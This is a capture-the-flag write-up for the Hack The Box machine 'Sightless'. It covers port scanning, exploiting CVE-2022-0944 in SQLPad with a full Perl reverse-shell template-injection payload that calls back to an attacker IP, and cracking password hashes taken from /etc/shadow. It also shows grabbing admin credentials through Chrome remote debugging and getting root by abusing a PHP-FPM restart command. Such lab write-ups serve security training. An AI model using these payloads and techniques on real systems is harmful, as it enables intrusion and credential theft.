Recon
└──╼ $nmap -p- -A 10.129.160.92
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 14:59 UTC
Nmap scan report for 10.129.160.92
Host is up (0.046s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.129.160.92]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=9/11%Time=66E1B055%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,A2,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20
SF:Server\)\x20\[::ffff:10\.129\.160\.92\]\r\n500\x20Invalid\x20command:\x
SF:20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try
SF:\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.98 secondsDirsearch finds nothing of value, no subdomains with gobuster found either.
Main site
Walking around the site we can find nice SQLPad site
We can learn its version too.
Sure enough, there is a CVE for it (its an easy box after all)
CVE-2022-0944
All of it is described here:
https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb
TLDR: Set listener on port 4444 and add new connection with driver MySQL amd database{{ process.mainModule.require('child_process').exec('perl -e \'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'') }}. Nice name.
We are in. Trying to do standard shell stabilisation with python3 -c 'import pty;pty.spawn("/bin/bash")' gives us python3: not found. Whoami gives “root” so we are probably in a container, with flag nowhere in sight.
Running linenum.sh confirms our fears.
It also shows that we have an additional entry in /etc/shadow file. Probably the pass for ssh.
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
Running john gets us:
blindside (root)
insaneclownposse (michael)
We are in via ssh, as predicted.
Priv esc
Running linenum again.
in /etc.daily we can see:clear
lrwxrwxrwx 1 root root 37 May 14 22:24 google-chrome -> /opt/google/chrome/cron/google-chrome
michael@sightless:/opt/google/chrome$ google-chrome --version
Google Chrome 125.0.6422.60 Once again we can get a CVE for chrome
Reading more output from linenum, we can find more info about john (user with higher privs) and chrome.
john 1647 0.0 0.6 33660 24580 ? S 14:51 0:04 /usr/bin/python3 /home/john/automation/administration.py
john 1648 0.3 0.3 33630172 15408 ? Sl 14:51 0:31 /home/john/automation/chromedriver --port=40373
john 1653 0.0 0.0 0 0 ? Z 14:51 0:00 [chromedriver] <defunct>
john 1659 0.6 2.8 34003124 114052 ? Sl 14:51 0:52 /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.5cgJoJ data:,
john 1661 0.0 0.0 33575860 3044 ? Sl 14:51 0:00 /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.4 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.60 --initial-client-fd=6 --shared-client-connection
john 1665 0.0 1.4 34112452 56388 ? S 14:51 0:00 /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1661 --enable-crash-reporter
john 1666 0.0 1.4 34112456 56896 ? S 14:51 0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1661 --enable-crash-reporter
john 1681 0.3 3.0 34362348 119676 ? Sl 14:51 0:31 /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=1661 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --fie
john 1682 0.1 2.1 33900068 86384 ? Sl 14:51 0:11 /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=1661 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,15292266550865892519,2896309854822872465,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
john 1710 3.0 4.5 1186799476 178872 ? Sl 14:51 4:06 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1661 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1726066167952305 --launcWe learn that chrome is running in headless mode, so there is no need to do tunneling. There is also “/automation/administration.py” file. We can read also about Chromedriver, which is often used for chrome automation. We also know that it is on port 40373.
running pspy we can also find that evert 60 seconds there is bin/bash /home/john/automation/healthcheck.sh running.
There is no d8 that we could use from the console, and it is needed to run the CVE. After a bit of stumbling I’ve decided to connect to chromedriver using browser.
Found this dev.to guide.
ssh -L 40373:127.0.0.1:40373 michael@10.129.160.92
/usr/bin/google-chrome --remote-debugging-port=40373
chrome://inspect/#devices
…and it doesnt work.
michael@sightless:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:3000 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:40517 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:34763 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:40373 0.0.0.0:*
tcp LISTEN 0 128 *:21 *:*
tcp LISTEN 0 128 [::]:22 [::]:* So tunneling via ssh again ssh -L 8080:127.0.0.1:8080 michael@10.129.160.92 gets us:
Its the foxlor that we could have read on the main site.
After seeing the domain error, I’ve changed address from localhost:8080 to 127.0.0.1:8080 and was greeted with a nice login page.
Our username and password doesnt work here though. There was no direct exploit, so I’ve went back to exploring ports.
ssh -L 33060:127.0.0.1:33060 \ -L 40517:127.0.0.1:40517 \ -L 34763:127.0.0.1:34763 \ -L 3306:127.0.0.1:3306 \ -L 40373:127.0.0.1:40373 \ michael@10.129.160.92
Trying to add ports again to remote debugger and it works with 127.0.0.1:34763.
Upon clicking inspect, we can see some magic going on. First we can see Froxlor page.
Then we can see the password being typed automaticly, probably by the healthcheck.sh script.We can see then this dashboard and finally we are logged out.
We can then press ctrl+e to capture all of the traffic in the inspector and press it again to stop after full cycle. We can inspect all of the packages then in peace. In index.php we can find username Admin and password ForlorfroxAdmin.
Going back to the 8080 port and we can log in.
I’ve thinkered for way too long with adding a php reverse shell to the site and then executing it. I’ve tried creating more subdomains too, but none of it worked. I’ve ended up abusing the php-fpm restart command.
I’ve tried using also netcat reverse shell, but the -e parameter is blocked. I tried also bash reverse shell, but the use of special chars like “&” and “>” is blocked. That is why I ended up creating it in a file. Then going to Settings >> PHP-FPM allows us to restart it, by toggling the switch on and off.
After waiting for a while, I got the shell with root access. It is neccessary to wait after each try, as the command is executed every 5 min by a cron job.
Cool box.